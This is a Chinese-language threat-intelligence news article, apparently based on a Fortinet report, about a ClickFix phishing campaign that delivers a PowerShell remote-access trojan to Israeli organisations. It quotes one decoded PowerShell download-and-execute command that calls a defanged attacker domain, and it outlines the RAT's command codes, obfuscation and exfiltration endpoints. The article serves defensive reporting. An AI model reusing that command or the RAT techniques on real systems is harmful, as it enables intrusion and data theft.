黑客利用ClickFix技术入侵Windows并执行PowerShell命令

Fortinet的FortiGuard实验室发现，威胁行为者发起了一场针对以色列基础设施和企业实体的地理聚焦型复杂网络入侵。攻击链完全通过Windows系统上的PowerShell脚本传递，实现远程访问，促进数据外泄、持久监控以及在受感染网络内的横向移动。

该行动被归类为高严重性，利用伪装成战时医疗物资管理指导会议邀请的钓鱼邮件，通过受损的内部电子邮件系统传播诱饵并提高感染率。完整的攻击流程依赖于基于PowerShell的多阶段传递机制，避免使用外部可执行文件以规避传统防病毒检测，载荷从攻击者控制的域名（如pharmacynod[.]com）获取。

攻击流程图

钓鱼活动针对以色列部门

初始访问向量始于钓鱼邮件，敦促收件人点击嵌入链接，将其重定向到伪造的Microsoft Teams界面。该虚假页面采用名为“ClickFix”的社会工程技术，指示用户按Windows + R打开运行对话框，粘贴剪贴板复制的字符串并执行，从而有效掩盖恶意PowerShell命令的启动。

运行对话框

网站HTML中嵌入了三个混淆的Base64编码字符串，解码后形成类似“powershell IEX ((Invoke-RestMethod -Uri hxxps://pharmacynod[.]com/Fix -Method GET).note.body)”的命令，从攻击者服务器检索并运行辅助脚本。此加载程序将诸如test.html的文件下载到受害者的公共下载文件夹，其中包含由“kendrick”等分隔符分隔的二进制编码块。

后续的PowerShell脚本通过拆分、将二进制转换为ASCII字符并将其重新组装为可执行代码来处理这些块，最终完全在PowerShell中部署远程访问木马（RAT）。

混淆载荷

深入分析显示，RAT的加载程序行为涉及下载混淆内容，包括通过自定义函数解压缩以进行内存执行的压缩Base64字符串。例如，脚本从test.html读取特定行，提取标记字符串，在分隔符上拆分，执行二进制到字符的转换（例如，“1100110”二进制等于十进制102，映射到字符“f”），并使用IEX调用结果代码。

此链最终形成一个持久的RAT，将其命令和控制（C2）服务器硬编码为pharmacynod[.]com，使用HTTPS进行所有通信。感染后，“init”函数收集受害者详细信息（如Windows域、计算机名和用户名），使用GZip和Base64压缩并反转两次，然后通过/16625端点注册。

RAT通过无限轮询循环保持持久性，在向C2发送POST请求以检索命令之前随机休眠2-7秒。C2的响应经过压缩、反转，并前缀如7979用于重新初始化、5322用于通过System.Net.WebClient下载载荷、4622用于调整轮询间隔或2474用于任意PowerShell执行，输出外泄到/17361。

规避技术包括分层混淆（双GZip、Base64编码、字符串反转）和URL安全替换，结合通过默认凭据、代理和通过urlmon.dll设置的用户代理模拟合法流量的原生.NET HTTP请求。

归因指向与已知威胁组织MuddyWater的潜在重叠，原因是区域目标、从受感染环境的横向扩展和脚本策略。然而，避免远程管理工具和公共文件主机以及新颖的全PowerShell RAT等偏差表明可能由另一个行为者进化或模仿。

此活动凸显了无文件攻击的风险，Fortinet保护措施包括防病毒签名（如PowerShell/Agent.PH!tr）、通过FortiEDR进行端点检测以及通过IPS和DNS过滤进行网络阻止以缓解此类威胁。

入侵指标（IOC）